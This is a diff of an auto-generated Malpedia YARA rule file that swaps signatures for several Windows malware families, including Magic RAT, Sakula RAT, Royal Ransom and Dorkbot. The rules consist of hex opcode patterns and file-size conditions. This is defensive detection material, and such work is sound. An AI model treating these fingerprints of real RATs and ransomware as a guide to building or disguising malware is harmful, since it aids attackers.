-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.funny_dream_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kdcsponge_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "cb215be87db33b154ffd783569bce8db609ba8b5cdc9d518db32c5fd6b7cb19c"
+		logic_hash = "4a397cc9ed7623d7a2a288b58acb6ea4c1ff2bde7c30c2fd6b35d7ed37df75f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88451,34 +88622,34 @@ rule MALPEDIA_Win_Funny_Dream_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 2bc6 8d9560feffff 50 }
-		$sequence_1 = { c745fc00000000 8d4f04 c74704???????? e8???????? }
-		$sequence_2 = { 8b1d???????? 7457 ffd3 3d33270000 754e }
-		$sequence_3 = { 7414 8b3d???????? 8d8d78ffffff 51 50 ffd7 85c0 }
-		$sequence_4 = { ff15???????? 85c0 0f8ee5000000 6a00 b80d000000 }
-		$sequence_5 = { 89855affffff 6689855effffff 8d8550ffffff 50 660fd68552ffffff ff15???????? }
-		$sequence_6 = { e8???????? 8b742414 83c408 85c0 748d 68???????? 50 }
-		$sequence_7 = { 03d8 8d5101 0f1f440000 8a01 41 84c0 }
-		$sequence_8 = { 8b9de8f7ffff 8b85fcfbffff 84c0 7514 80fc5a 0fb6db b901000000 }
-		$sequence_9 = { 8b85c4fdffff 89441f05 8b85b8fdffff 89441f09 8b85bcfdffff 89441f0d 83c711 }
+		$sequence_0 = { 3881c3040000 7506 8881c5040000 e8???????? 488d8b44030000 488bd3 4883c420 }
+		$sequence_1 = { 418d4102 83f801 761e 498bc9 488d1553b40100 83e13f 498bc1 }
+		$sequence_2 = { c781a004000002000000 c7416000002000 48c7812801000000000200 48c7815801000001000000 48c7816001000001000000 c7813001000020000000 }
+		$sequence_3 = { c745d408574883 488d0d084a0200 c745d8ec20488b c745dc7918488b c745e0d94885ff c745e40f8500c5 c745e8010033c0 }
+		$sequence_4 = { 8b8b60040000 83c102 c7837c04000008000000 48ffc1 48018b20040000 488b8b6c040000 488b8320040000 }
+		$sequence_5 = { 4d85c0 7428 488b8220040000 48ffc0 493bc0 7219 c782a904000001000000 }
+		$sequence_6 = { 488d1565f50300 488b04c2 48898160010000 48ff8120040000 48c781e401000000000300 48c781f801000010000000 48c781a000000001000000 }
+		$sequence_7 = { 488b8320040000 488d9344030000 4c8bc3 0fb648ff c1e904 4883c420 5b }
+		$sequence_8 = { e9???????? 8b8138040000 89813c040000 c6810904000008 c7814004000070000000 eb44 80b9b104000001 }
+		$sequence_9 = { c7416000000100 48c7812801000000000200 48c7815801000001000000 48c7816001000001000000 c7813001000040000000 c3 33c0 }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 720896
 }
-rule MALPEDIA_Win_Play_Auto : FILE
+rule MALPEDIA_Win_Magic_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4738940b-7da5-50c4-88b2-14247a6e9490"
+		id = "294a613b-706a-59cd-8861-ad8f327481f6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.play_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magic_rat_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "5818fd91a2bec1f70682fe35fe8b96ef11658990dd8b01971531f81d25cdc716"
-		score = 75
-		quality = 75
+		logic_hash = "6b25c43e846cdbf4276d18349be54a1db9c0a30e7cc0f465fa60ef70531174db"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88490,32 +88661,32 @@ rule MALPEDIA_Win_Play_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80c316 befcffffff 8ac3 02db 02c3 02c7 008528feffff }
-		$sequence_1 = { 6804010000 50 e8???????? 8b95acfdffff 8d8dc8fdffff }
-		$sequence_2 = { f30f7e05???????? 660fd685d8fcffff 0f1005???????? c68508fdffff00 c68566fdffff4f 0f11857cfcffff }
-		$sequence_3 = { 99 8bf8 8d45c8 83c7ff 50 83d2ff 83ec08 }
-		$sequence_4 = { 8b5df8 8bd3 e8???????? 0fb67dbe 8bd3 8b4de4 }
-		$sequence_5 = { 000f 843402 0000 83ec04 b021 b24c }
-		$sequence_6 = { e9???????? 0fb7cb 81f97e0e0000 7645 8a95cffeffff 81c182f1ffff }
-		$sequence_7 = { 8945e8 0fb705???????? 668945ec a1???????? }
-		$sequence_8 = { 0fb705???????? 660fd68584fdffff f30f7e05???????? 660fd68578fdffff 0f1005???????? 668985b4fdffff }
-		$sequence_9 = { 8b85a8fdffff 6603fb 6640 6689bd04feffff 8985a8fdffff 41 66898588fdffff }
+		$sequence_0 = { eb1c 85c0 7910 ba00200000 29c2 89d0 c1f80e }
+		$sequence_1 = { 0f842f010000 83f8ff 740e f0832d????????01 }
+		$sequence_2 = { c1e010 eb1c 85c0 7910 ba00200000 29c2 89d0 }
+		$sequence_3 = { 7442 81fa???????? 742a 81fa???????? 7442 81fa???????? 744a }
+		$sequence_4 = { f6c380 b801000000 750d 89d8 c1e806 83f001 83e001 }
+		$sequence_5 = { 66251ffc 0c80 66894348 e9???????? }
+		$sequence_6 = { 85c0 7910 ba00200000 29c2 89d0 c1f80e }
+		$sequence_7 = { c0e902 83e101 09ca c1e202 }
+		$sequence_8 = { 0fb754244c 69d2e8030000 01d0 0fb754244e }
+		$sequence_9 = { 660f28c8 f20f5c0d???????? f20f2cd1 660fefc9 f20f2aca f20f5cc1 }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 41843712
 }
-rule MALPEDIA_Win_Powerduke_Auto : FILE
+rule MALPEDIA_Win_Redpepper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "658a1cda-5f77-56de-9f18-f831b8e1b259"
+		id = "fe9a2c74-3bcd-57d2-a4a6-d3f35fe0f1be"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerduke_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redpepper_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "d2182db867ff6a53a7d17e85e856d89d6c3d1d584f315f5e805e29753b64695e"
+		logic_hash = "c4da24b7951d6f6fb7e27212edbac20ef8484913731cd43af2131db52962e64a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88529,32 +88700,32 @@ rule MALPEDIA_Win_Powerduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 09c0 7434 0345cc 3b4518 0f87f5010000 }
-		$sequence_1 = { 50 ffb5f8fbffff ff15???????? 58 c9 }
-		$sequence_2 = { 56 ff15???????? 09c0 742f 89c7 6a00 }
-		$sequence_3 = { 09c0 7518 8d85f8f3ffff 8d8dfcfbffff 51 50 }
-		$sequence_4 = { 55 89e5 81ec08100000 56 57 8d85f8efffff }
-		$sequence_5 = { 8b451c c70000000000 837d2000 740f 8b4520 8945dc c745e000000000 }
-		$sequence_6 = { c645e000 c745e177696e68 c745e57474702e 66c745e9646c c645eb6c }
-		$sequence_7 = { 56 57 8d85f8efffff 50 6819000200 6a00 68???????? }
-		$sequence_8 = { 8d8df8f3ffff 51 68???????? 50 ff15???????? 83c40c b9???????? }
-		$sequence_9 = { 8f05???????? c705????????03000000 c745f803000000 ff75dc 8f45f0 ff75e0 8f45f4 }
+		$sequence_0 = { 40 50 eb03 50 }
+		$sequence_1 = { 741e 8b4050 6800400000 50 }
+		$sequence_2 = { 3bf0 7ce1 68???????? e8???????? c70424???????? e8???????? c70424???????? }
+		$sequence_3 = { 85c0 741e 8b442428 50 68???????? 6a02 }
+		$sequence_4 = { 85f6 745a 8b4604 8b7c2420 8b5c2414 85c0 }
+		$sequence_5 = { 56 e8???????? 83c404 c7472000000000 c7471400000000 }
+		$sequence_6 = { 7522 6893020000 68???????? 6a3a 6883000000 }
+		$sequence_7 = { 7f0c 0fbec9 c1e006 8d4408bf eb4e }
+		$sequence_8 = { 894610 89462c 8d4638 896e04 50 }
+		$sequence_9 = { 56 56 c705????????01000000 ff15???????? 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 2482176
 }
-rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
+rule MALPEDIA_Win_Pcshare_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3133a569-e0c5-5978-8ff0-ff719a8c5fe7"
+		id = "41819f37-8279-594b-8188-e1afa20f2f95"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.enigma_loader_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pcshare_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a5243000c2e0d210886f2730559565c47c46e77ae7333cb6bce278e91fb001ee"
+		logic_hash = "b635afb96c2581863fb56aba8aaab8da9fbce00f8a052e881f8a8f014820c9d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88568,32 +88739,32 @@ rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 790c 488d0daa400200 e9???????? 488b5c2450 ba9844c880 }
-		$sequence_1 = { 81f9df000000 7f7a 7451 81f9d4000000 7f1c 7447 81f9ce000000 }
-		$sequence_2 = { 4c897560 660f6f0d???????? f30f7f4d70 44887560 488d0521c70200 48898580000000 }
-		$sequence_3 = { 488b7908 4885ff 744e 488b29 488b0f 488b7108 }
-		$sequence_4 = { 4a0fbe843978940200 428a8c3988940200 482bd0 8b72fc d3ee 443bce 0f8d5f010000 }
-		$sequence_5 = { 418bc4 41f7e0 b801000000 c1ea04 662bc2 0fb7c0 6bc834 }
-		$sequence_6 = { 48c1e102 48c7c0fcffffff 482bc1 eb11 4c8b02 4d03c3 498bc0 }
-		$sequence_7 = { 83e901 7435 83f901 0f850c020000 660f6f05???????? c745c780000000 c745cbbf000000 }
-		$sequence_8 = { 0f8778070000 e9???????? 48897560 41bc0f000000 4c896578 48c7457005000000 8b05???????? }
-		$sequence_9 = { 48832300 4883c308 488d0514ce0100 483bd8 75d8 b001 4883c420 }
+		$sequence_0 = { 8d7c2418 33c0 f3a5 66a5 b935000000 }
+		$sequence_1 = { c744242c01000000 e8???????? 8b8c24e0010000 8dbc2410010000 33c0 83c410 8d5910 }
+		$sequence_2 = { 8bf0 85f6 7630 8b4d04 2bc6 50 8d1431 }
+		$sequence_3 = { 894124 c7413800000000 c7413c00000000 895134 c20c00 6aff 68???????? }
+		$sequence_4 = { e8???????? 895c2450 51 8d4c2414 8bc4 c784247801000004000000 89642468 }
+		$sequence_5 = { 3bc6 7505 b8???????? 6a05 68???????? 50 e8???????? }
+		$sequence_6 = { 0fb641ff 0fb6d2 3bc2 0f8794000000 8088e184061004 40 ebee }
+		$sequence_7 = { 56 8d4c2418 88442418 e8???????? 8b0d???????? 51 56 }
+		$sequence_8 = { c644242800 8b4508 89442410 8bf8 8d442410 897c2418 50 }
+		$sequence_9 = { 8b4c2410 8d0431 50 e8???????? 8b4c2414 83c404 03c8 }
 
 	condition:
-		7 of them and filesize < 798720
+		7 of them and filesize < 893708
 }
-rule MALPEDIA_Win_Blackbyte_Auto : FILE
+rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "452fd00b-5b18-59a5-8a83-8658b17c13ef"
+		id = "59e43108-0eea-5a85-94be-e4f2f553739a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackbyte_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dorkbot_ngrbot_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3e97ee9c8cf8b212a848f172ac3c7f3f16e8569d16a1ada661dd50af9fb2d432"
+		logic_hash = "e7e0ed048f71ac1a9fd0b9da304618de36953790efcba8c3991a4e9c9121ea29"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88607,38 +88778,32 @@ rule MALPEDIA_Win_Blackbyte_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d6c2458 b802000000 b908000000 31d2 }
-		$sequence_1 = { 0f29442450 85ff 0f8e82010000 4c8b5c2450 }
-		$sequence_2 = { 488d8424c0000000 e8???????? 89442460 895c2464 }
-		$sequence_3 = { 488d8424c0000000 31db 31c9 4889cf }
-		$sequence_4 = { 488d7301 4889c2 4889cf 488b442468 }
-		$sequence_5 = { 488d6c2440 4889442450 48894c2460 4885ff }
-		$sequence_6 = { 488d8424c0000000 48898424a8000000 488d8c24a0000000 48898c24d8000000 }
-		$sequence_7 = { 488d6c2440 4889442428 48895c2458 488b0d???????? 48894c2430 4889c8 e8???????? }
-		$sequence_8 = { 3b1d???????? 7cdb 33c0 488b5c2430 }
-		$sequence_9 = { 0f11442440 0f1005???????? 0f114c2450 0f100d???????? 0f11442460 }
-		$sequence_10 = { 3b1d???????? 7d09 488b0d???????? ebb0 }
-		$sequence_11 = { 3b1f 72bd 8b842470100000 eb4c }
-		$sequence_12 = { 0f29442430 e8???????? 0f1003 4c8bc7 488d542430 488d4c2420 660f7f742430 }
-		$sequence_13 = { 488d6c2458 b801000000 b9fb000000 31d2 31db 31f6 31ff }
-		$sequence_14 = { 3b1d???????? 7ce2 488b1d???????? 488bbc24d8000000 }
-		$sequence_15 = { 0f29442440 e8???????? 85c0 0f85d7000000 }
+		$sequence_0 = { 3b5dfc 72c5 5f 33c0 5b 8be5 5d }
+		$sequence_1 = { 33f6 68ff030000 8d85e9fbffff 56 50 8975fc }
+		$sequence_2 = { 56 e8???????? 85c0 7503 5e 5d c3 }
+		$sequence_3 = { 68???????? 56 ff15???????? 8b3d???????? 50 ffd7 }
+		$sequence_4 = { 68???????? 68???????? 68???????? e8???????? 83c414 eb49 ff15???????? }
+		$sequence_5 = { 51 6a05 68???????? 52 e8???????? 50 ff15???????? }
+		$sequence_6 = { 83c408 3bd8 5b 0f8283000000 68???????? e8???????? }
+		$sequence_7 = { 85c0 7411 2bc2 83e805 894101 c601e9 b805000000 }
+		$sequence_8 = { 6a40 6800300000 50 53 51 8945f4 }
+		$sequence_9 = { 50 e8???????? 83c404 85c0 7e14 8b4cbe10 51 }
 
 	condition:
-		7 of them and filesize < 9435136
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Meltingclaw_Auto : FILE
+rule MALPEDIA_Win_Predator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b6f1fa7-265c-5ffe-9d34-c9502295b009"
+		id = "2b266341-4566-5b09-970f-78abdb005204"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meltingclaw"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meltingclaw_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.predator_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "379103784a97b527734f31e44cda4d460b2bdbd8572feff4730fa002535654cf"
+		logic_hash = "3bb19506092c3990d39445359bc46f20b598a2af4c01b1d17206710e9f68b421"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88652,71 +88817,84 @@ rule MALPEDIA_Win_Meltingclaw_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d8da8000000 48ffc9 48ffc1 803900 75f8 4c8d4590 33d2 }
-		$sequence_1 = { 4c8b0a 33f6 448bc6 48c7420816000000 4c8bd2 48c7421009000000 488bf9 }
-		$sequence_2 = { 7424 83ea01 7412 83fa01 7562 }
-		$sequence_3 = { 0fb74c4420 6643890c46 49ffc0 4983f80a 72b0 488b8c2420020000 4833cc }
-		$sequence_4 = { 49c706212a0100 488906 410fbec2 6bc83f 49c70700010000 80c121 418809 }
-		$sequence_5 = { 85c0 78d6 3de4000000 73cf 4803c0 418b84c790bd0100 ebc4 }
-		$sequence_6 = { 0fb6c0 0fb74c4420 6643890c46 49ffc0 4983f80e 72b0 488b8c2420020000 }
-		$sequence_7 = { 7508 48396930 b001 7403 408ac5 }
-		$sequence_8 = { 72e8 41881c39 49ffc1 4983f94c 72af 488b5c2408 }
-		$sequence_9 = { d3e8 4d894708 41894718 410fb608 83e10f 480fbe841140960100 }
+		$sequence_0 = { 89560c 834dfcff 8b4df4 64890d00000000 5f }
+		$sequence_1 = { 56 8bf1 8d4dfd 57 6a0a }
+		$sequence_2 = { 83ec18 8bc2 56 8bf1 8d4dfd 57 }
+		$sequence_3 = { 83c8ff e9???????? ff75ec e8???????? 59 8bf0 }
+		$sequence_4 = { 8b00 57 03c2 8bce 50 }
+		$sequence_5 = { 8d45fd 50 51 8bce }
+		$sequence_6 = { e9???????? ff75ec e8???????? 59 8bf0 }
+		$sequence_7 = { 0f42f9 83781410 7202 8b00 57 03c2 8bce }
+		$sequence_8 = { 56 57 8965f0 8365fc00 8b7508 8b450c }
+		$sequence_9 = { 8811 85c0 75f2 51 8d45fd 50 51 }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 2211840
 }
-rule MALPEDIA_Win_Unidentified_111_Auto : FILE
+rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_111_auto.yar#L1-L125"
+		id = "86323bfd-db14-578a-8cfe-f67cc00a757a"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sakula_rat_auto.yar#L1-L230"
 		license_url = "N/A"
-		logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9"
+		logic_hash = "19fb36915bb248bef0dadfadf28e10045720b8ee2d6f5e400ec2d27910f47a25"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 }
-		$sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a }
-		$sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a }
-		$sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? }
-		$sequence_4 = { eb1f c744242000000000 4533c9 4533c0 }
-		$sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 }
-		$sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? }
-		$sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 }
-		$sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 }
-		$sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 }
+		$sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? }
+		$sequence_1 = { 33c9 85f6 7e15 8a0411 84c0 7409 }
+		$sequence_2 = { 742d 46 83fe03 7cd6 a1???????? 40 }
+		$sequence_3 = { b803000000 eb1b e8???????? 83f801 }
+		$sequence_4 = { e8???????? 83c404 5b 85c0 5f a3???????? 0f95c0 }
+		$sequence_5 = { 7e0b 803c385c 7405 48 85c0 7ff5 3bc1 }
+		$sequence_6 = { c3 53 e8???????? 69f6a4010000 0335???????? 8bde }
+		$sequence_7 = { 6800100000 6800940100 6a00 ff15???????? 8bf0 85f6 }
+		$sequence_8 = { ff75f4 ff75fc e8???????? 83c408 68???????? ff75fc }
+		$sequence_9 = { 48895c2408 4889742418 57 4883ec40 ffca }
+		$sequence_10 = { ff75e8 ff75e4 e8???????? 8d45dc }
+		$sequence_11 = { ff15???????? 488364243800 488364243000 4c8bc6 33d2 }
+		$sequence_12 = { ff7508 e8???????? 83c408 31c0 40 50 }
+		$sequence_13 = { 488b4c2450 8d5340 ff15???????? 488b4c2458 8d53f1 }
+		$sequence_14 = { 448d4260 e8???????? 33db 33c0 488d4de2 33d2 41b8ce070000 }
+		$sequence_15 = { 0fbe02 83f85a 7f24 8b4d08 034df8 }
+		$sequence_16 = { ff15???????? 488d15a4100000 488d0d05210000 ff15???????? 488d1d08230000 }
+		$sequence_17 = { 3bc6 741b 488b4dc7 488b01 ff90a8000000 3bc6 }
+		$sequence_18 = { 8b4508 0514010000 50 ff35???????? }
+		$sequence_19 = { 488d68a1 4881ecc0000000 488365c700 488d15e90f0000 488d0d021f0000 498bf0 }
+		$sequence_20 = { 8b4110 40 894304 8b410c }
+		$sequence_21 = { 8364245800 ff15???????? 488d542458 488bc8 ff15???????? 488b7008 488bce }
+		$sequence_22 = { 83fa00 7404 49 4a ebeb }
 
 	condition:
-		7 of them and filesize < 148480
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Nestegg_Auto : FILE
+rule MALPEDIA_Win_Hzrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "315a7796-8683-5d7a-8cf2-784c6dd94f9d"
+		id = "a3d57e55-1483-5768-a078-1e6af35b2fc8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nestegg_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hzrat_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "4273a1509259a06eece460649eb821123ed1b442866d55968fb9b1f2cfa0fb16"
+		logic_hash = "caebe3b063bb24ee2db19144295d7a39f41baf69a2ce331f663ee48cf20d8acf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88730,32 +88908,32 @@ rule MALPEDIA_Win_Nestegg_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 3bfb 0f840efdffff 3bf3 7408 8b06 6a01 }
-		$sequence_1 = { 7e1c 57 ffd3 8b4c2414 83c404 8d0c49 }
-		$sequence_2 = { 8a542414 83e207 668910 8b7c241c 8bcf e8???????? 8bcf }
-		$sequence_3 = { b801000000 5b 81c404280000 c3 5f 33c0 }
-		$sequence_4 = { 8d7c2415 c644241400 f3ab 8bb42418040000 6a04 }
-		$sequence_5 = { 33c0 53 8944240f 56 57 33db 8944241b }
-		$sequence_6 = { 89743c20 81c700010000 6a00 8d442420 57 50 6a00 }
-		$sequence_7 = { 85c0 74d4 8b442410 8bcf 50 e8???????? }
-		$sequence_8 = { 6a01 8d4c2424 c744243c00000000 c644241c00 c744241d00000000 }
-		$sequence_9 = { 64a100000000 6aff 68???????? 50 b820410000 }
+		$sequence_0 = { 50 ff7704 ff15???????? 85c0 7516 5f }
+		$sequence_1 = { 8d85f0fbffff 50 56 e8???????? 83c40c c6043e00 eb1e }
+		$sequence_2 = { 8b4130 8b7804 8bcf 897dd8 8b07 ff5004 6a00 }
+		$sequence_3 = { 0f848c000000 6a04 c645e802 ff15???????? }
+		$sequence_4 = { 56 8bf0 898588feffff 57 56 e8???????? 8b8de1feffff }
+		$sequence_5 = { 03fe 83bd7cfeffff00 7476 85ff }
+		$sequence_6 = { 57 e8???????? 83c404 e9???????? 6a04 68???????? 8d8d94feffff }
+		$sequence_7 = { 5b 5d c3 85c0 78f5 8b1cc564444200 6a55 }
+		$sequence_8 = { 7462 0faee8 0fb67ee2 0fb642e2 2bf8 751e 0faee8 }
+		$sequence_9 = { 884c382b 83fa03 7511 8b45fc 8a0e 46 8b048510fa4200 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Moontag_Auto : FILE
+rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "252dd0ca-7f51-52f0-be53-827b6e26bc25"
+		id = "a9b95381-6997-59af-bb2e-993bae34608b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moontag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moontag_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royal_ransom_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "370fc05010b7ffbaa6352b0066ee43dee7ad1117e24576294ef38cbd09f73c67"
+		logic_hash = "05ad7a29faf1ca692a5b6df2d422be2fdcf12c3fc6c9f7021ff0ef0bb4b8bcb3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88769,32 +88947,32 @@ rule MALPEDIA_Win_Moontag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d3d17430000 4885db 7407 44383b 480f45fb 488d45b0 }
-		$sequence_1 = { f20f100d???????? 0f11442448 48895c2428 48896c2430 896c2440 89742444 f20f114c2458 }
-		$sequence_2 = { 48894320 48894328 48894330 48894338 c7431802000000 48896c2430 4885ff }
-		$sequence_3 = { c60322 eb2c c60362 eb27 c60366 eb22 c6036e }
-		$sequence_4 = { 33d2 448d4264 488d4d94 e8???????? c7459068000000 }
-		$sequence_5 = { 0f100d???????? 48894dc0 8d4b40 f20f1005???????? 66480f7ec8 488955c8 }
-		$sequence_6 = { 48895de0 448bcb 48895de8 48895df0 }
-		$sequence_7 = { 7354 498b0cff e8???????? 488bd8 4885c0 7420 }
-		$sequence_8 = { 0fb744244a 3bc1 7f13 0f8c68010000 0fb744244c }
-		$sequence_9 = { 4885db 0f8487000000 488d4580 4883fe10 480f43c7 4883fb01 7518 }
+		$sequence_0 = { 8bd0 488d0de62fe4ff 488d05cf33e3ff 488903 e9???????? 428d14cd00000000 498bca }
+		$sequence_1 = { b820000000 e8???????? 482be0 488bca e8???????? 488bc8 488d15a73d0800 }
